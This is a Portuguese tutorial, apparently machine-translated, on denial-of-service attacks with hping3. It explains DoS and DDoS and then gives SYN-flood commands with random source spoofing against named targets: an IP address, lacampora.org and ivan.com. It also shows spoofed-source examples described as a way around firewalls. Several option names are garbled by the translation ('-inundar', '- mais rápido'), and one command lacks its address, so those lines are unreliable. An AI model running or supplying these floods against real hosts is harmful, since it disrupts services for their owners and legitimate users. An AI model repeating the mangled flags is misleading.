Segurança

hping3 flood ddos

hping3 flood ddos
Este tutorial se concentra em ataques DDOS (negação de serviço distribuída) usando a ferramenta hping3. Se você já está familiarizado com os ataques DOS (Denial of Service) e DDOS, você pode continuar lendo as instruções práticas do hping3, caso contrário, é recomendado aprender como esses ataques funcionam.

Ataques DOS


Um ataque de negação de serviço (DOS) é uma técnica muito simples para negar a acessibilidade aos serviços (por isso é chamado de ataque de "negação de serviço"). Este ataque consiste em sobrecarregar o alvo com pacotes superdimensionados, ou uma grande quantidade deles.

Embora este ataque seja muito fácil de executar, ele não compromete as informações ou a privacidade do alvo, não é um ataque de penetração e visa apenas impedir o acesso ao alvo.
Ao enviar uma quantidade de pacotes, o alvo não consegue lidar com os invasores e impede que o servidor atenda a usuários legítimos.

Os ataques DOS são executados a partir de um único dispositivo, portanto, é fácil interrompê-los bloqueando o IP do invasor, mas o invasor pode alterar e até mesmo falsificar (clonar) o endereço IP de destino, mas não é difícil para os firewalls lidar com esses ataques , ao contrário do que acontece com ataques DDOS.

Ataques DDOS

Um ataque de negação de serviço distribuído (DDOS) é semelhante a um ataque DOS, mas executado a partir de nós diferentes (ou atacantes diferentes) simultaneamente. Normalmente, os ataques DDOS são realizados por botnets. Botnets são scripts ou programas automatizados que infectam computadores para realizar uma tarefa automatizada (neste caso, um ataque DDOS). Um hacker pode criar um botnet e infectar muitos computadores a partir dos quais botnets lançarão ataques DOS, o fato de muitos botnets dispararem simultaneamente transforma o ataque DOS em um ataque DDOS (é por isso que é chamado de "distribuído").

Claro, existem exceções em que os ataques DDOS foram realizados por atacantes humanos reais, por exemplo, o grupo de hackers Anonymous integrado por milhares de pessoas em todo o mundo usou essa técnica com muita frequência devido à sua fácil implementação (exigia apenas voluntários que compartilhassem sua causa), foi assim que o Anonymous deixou o governo líbio de Gaddafi completamente desconectado durante a invasão, o estado líbio ficou indefeso diante de milhares de atacantes de todo o mundo.

Este tipo de ataque, quando realizado a partir de muitos nós diferentes, é extremamente difícil de prevenir e interromper e normalmente requer hardware especial para lidar, porque firewalls e aplicativos defensivos não estão preparados para lidar com milhares de atacantes simultaneamente. Este não é o caso do hping3, a maioria dos ataques realizados através desta ferramenta serão bloqueados por dispositivos defensivos ou software, embora seja útil em redes locais ou contra alvos mal protegidos.

Sobre hping3

A ferramenta hping3 permite que você envie pacotes manipulados. Esta ferramenta permite controlar o tamanho, a quantidade e a fragmentação dos pacotes para sobrecarregar o alvo e contornar ou atacar os firewalls. Hping3 pode ser útil para fins de teste de segurança ou capacidade, usando-o você pode testar a eficácia de firewalls e se um servidor pode lidar com uma grande quantidade de pacotes. Abaixo você encontrará instruções sobre como usar o hping3 para fins de teste de segurança.

Primeiros passos com ataques DDOS usando hping3:

Em distribuições baseadas em Debian e Linux, você pode instalar hping3 executando:

# apt install hping3 -y

Um simples ataque DOS (não DDOS) seria:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Onde:
sudo: concede os privilégios necessários para executar o hping3.
hping3:
chama o programa hping3.
-S: especifica pacotes SYN.
-inundar: atire à vontade, as respostas serão ignoradas (é por isso que as respostas não serão mostradas) e os pacotes serão enviados o mais rápido possível.
-V: Verbosidade.
-p 80: porta 80, você pode substituir este número pelo serviço que deseja atacar.
170.155.9.185: IP alvo.

Inundar usando pacotes SYN na porta 80:

O exemplo a seguir retrata um ataque SYN contra lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Onde:
Lacampora.org: é o alvo
-q: saída breve
-n: mostrar IP de destino em vez de host.
-d 120: definir o tamanho do pacote
-fonte rand: esconder o endereço IP.

O exemplo a seguir mostra outro exemplo possível de inundação:

Inundação de SYN contra a porta 80:

# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood

Com o hping3 você também pode atacar seus alvos com um IP falso, a fim de contornar um firewall, você pode até clonar seu próprio IP de destino, ou qualquer endereço permitido que você conheça (você pode consegui-lo por exemplo com Nmap ou um sniffer para ouvir estabelecido conexões).

A sintaxe seria:

# sudo hping3 -a -S -q -p 80 - mais rápido -c2

Neste exemplo prático, o ataque pareceria:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 - mais rápido -c2

Espero que você tenha achado este tutorial sobre hping3 útil. Continue seguindo LinuxHint para obter mais dicas e atualizações sobre Linux e rede.

Controle e gerencie o movimento do mouse entre vários monitores no Windows 10
Gerenciador de mouse com tela dupla permite que você controle e configure o movimento do mouse entre vários monitores, diminuindo seus movimentos pert...
WinMouse permite que você personalize e melhore o movimento do ponteiro do mouse no PC com Windows
Se você quiser melhorar as funções padrão do ponteiro do mouse, use um freeware WinMouse. Ele adiciona mais recursos para ajudá-lo a obter o máximo do...
O botão esquerdo do mouse não funciona no Windows 10
Se você estiver usando um mouse dedicado com seu laptop ou computador desktop, mas o o botão esquerdo do mouse não funciona no Windows 10/8/7 por algu...